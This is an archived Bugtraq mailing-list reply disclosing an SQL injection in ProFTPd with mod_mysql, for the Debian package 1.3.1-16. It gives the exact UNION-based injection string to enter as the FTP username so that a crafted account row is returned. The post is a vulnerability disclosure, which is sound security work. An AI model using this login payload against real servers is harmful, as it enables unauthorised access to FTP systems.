Bugtraq mailing list archives
Re: Re: Another SQL injection in ProFTPd with mod_mysql (probably postgres as well)
From: gat3way () gat3way eu
Date: Wed, 11 Feb 2009 00:20:56 -0700
Uh-oh, sorry, bad copy-paste..the user is just %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; -- not USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; -- I am using debian packaged proftpd 1.3.1-16 if that matters.
Current thread:
- Another SQL injection in ProFTPd with mod_mysql (probably postgres as well) gat3way (Feb 10)
- Re: Another SQL injection in ProFTPd with mod_mysql (probably postgres as well) Daniel Mayer (Feb 10)
- Re: Another SQL injection in ProFTPd with mod_mysql (probably postgres as well) Sergio Aguayo (Feb 11)
- Re: Another SQL injection in ProFTPd with mod_mysql (probably postgres as well) Edward Bjarte Fjellskål (Feb 11)
- <Possible follow-ups>
- Re: Re: Another SQL injection in ProFTPd with mod_mysql (probably postgres as well) gat3way (Feb 11)